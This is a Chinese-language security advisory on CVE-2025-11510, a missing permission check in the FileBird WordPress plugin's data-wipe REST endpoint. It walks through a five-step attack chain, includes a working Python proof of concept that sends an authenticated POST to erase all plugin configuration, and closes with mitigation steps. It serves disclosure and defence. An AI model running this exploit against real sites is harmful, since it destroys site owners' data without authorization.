CVE-2025-11510：FileBird WordPress插件权限检查缺失漏洞

漏洞信息

漏洞编号

CVE-2025-11510

漏洞类型

权限提升/未授权数据修改

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FileBird – WordPress Media Library Folders & File Manager

漏洞概述

CVE-2025-11510是FileBird WordPress媒体库文件夹与文件管理插件中的一个安全漏洞。该插件是WordPress生态系统中广泛使用的媒体管理工具，允许用户通过文件夹形式组织媒体库文件。

该漏洞属于典型的权限检查缺失（Missing Capability Check）问题，存在于插件的REST API端点/filebird/v1/fb-wipe-clear-all-data中。在所有6.4.9及以下版本中，该端点未对调用者进行充分的权限验证，导致任何具有Author级别（作者权限）及以上的认证用户都可以调用该接口，执行清除插件所有配置数据的操作。

该漏洞由WordPress安全公司WordFence的安全研究员发现并报告，CVSS 3.1评分为4.3分，属于中等严重级别。虽然该漏洞不会直接导致远程代码执行或敏感数据泄露，但由于其能够重置插件的全部配置数据，可能对依赖FileBird插件进行媒体管理的网站造成运营中断和数据丢失的间接影响。攻击者利用此漏洞可以恶意清除网站管理员精心组织的媒体文件夹结构和配置信息，迫使管理员重新进行繁琐的配置工作。

技术细节

该漏洞的核心问题在于插件REST API路由注册时缺少适当的能力（capability）检查。

在WordPress插件开发中，注册自定义REST API端点时，开发者需要通过'permission_callback'参数指定访问该端点所需的权限。如果未正确设置该回调函数或将其设置为始终返回true，则任何认证用户都可以访问该端点。

漏洞端点为/filebird/v1/fb-wipe-clear-all-data，对应的功能是清除FileBird插件的所有数据和配置。该端点未验证调用者是否具有管理员权限（manage_options），导致具有较低权限的Author用户（通常仅能发布和管理自己的文章）也能够调用此端点。

利用方式如下：
1. 攻击者首先需要拥有一个Author级别或以上的WordPress账号（可通过注册或窃取凭证获得）
2. 使用有效的认证Cookie或Nonce值构造针对该REST API端点的POST请求
3. 服务器接收请求后，由于缺少权限验证，直接执行清除插件数据的操作
4. 插件的所有配置数据、文件夹结构信息被重置

该漏洞的修复方式是在permission_callback中添加对当前用户权限的检查，确保只有管理员才能调用该清除数据的功能。

攻击链分析

STEP 1

步骤1：获取认证凭证

攻击者通过注册新账号（如果网站开放注册）、购买凭证或利用其他漏洞获取一个具有Author级别及以上权限的WordPress账号。

STEP 2

步骤2：获取有效的Nonce值

攻击者登录WordPress后台，从页面源码中提取_wpnonce值或通过REST API获取有效的X-WP-Nonce认证令牌。

STEP 3

步骤3：构造恶意请求

攻击者构造针对/filebird/v1/fb-wipe-clear-all-data端点的POST请求，携带有效的认证Cookie和Nonce值。

STEP 4

步骤4：发送请求触发漏洞

由于该端点缺少权限检查，服务器直接处理请求并执行清除FileBird插件所有配置数据的操作。

STEP 5

步骤5：造成数据丢失

FileBird插件的所有文件夹结构、配置信息被重置，网站管理员需要重新配置媒体库管理设置，造成运营中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-11510 PoC - FileBird Plugin Unauthorized Data Reset
# Target: WordPress site with FileBird plugin <= 6.4.9
# Required: Authenticated user with Author-level access or above

TARGET_URL = "http://target-wordpress-site.com"
# WordPress REST API nonce obtained from an authenticated session
NONCE = "your_authenticated_nonce_here"
COOKIES = {
    "wordpress_logged_in_xxx": "your_authenticated_cookie_here"
}

def exploit_clear_alldata():
    """
    Exploit the missing capability check on /filebird/v1/fb-wipe-clear-all-data
    endpoint to reset all FileBird plugin configuration data.
    """
    endpoint = f"{TARGET_URL}/wp-json/filebird/v1/fb-wipe-clear-all-data"

    headers = {
        "Content-Type": "application/json",
        "X-WP-Nonce": NONCE
    }

    # Send POST request to trigger the data wipe functionality
    response = requests.post(
        endpoint,
        headers=headers,
        cookies=COOKIES,
        json={}
    )

    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")

    if response.status_code == 200:
        print("[+] Exploit successful! All FileBird data has been wiped.")
    else:
        print("[-] Exploit failed.")

if __name__ == "__main__":
    exploit_clear_alldata()

影响范围

FileBird Plugin <= 6.4.9

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）通过WordPress后台或代码方式禁用FileBird插件；2）限制网站用户注册功能，将默认角色设置为最低权限；3）使用WAF规则阻止对/filebird/v1/fb-wipe-clear-all-data端点的访问请求；4）审计所有Author级别及以上用户账号，删除可疑账号；5）监控插件配置数据是否被异常修改。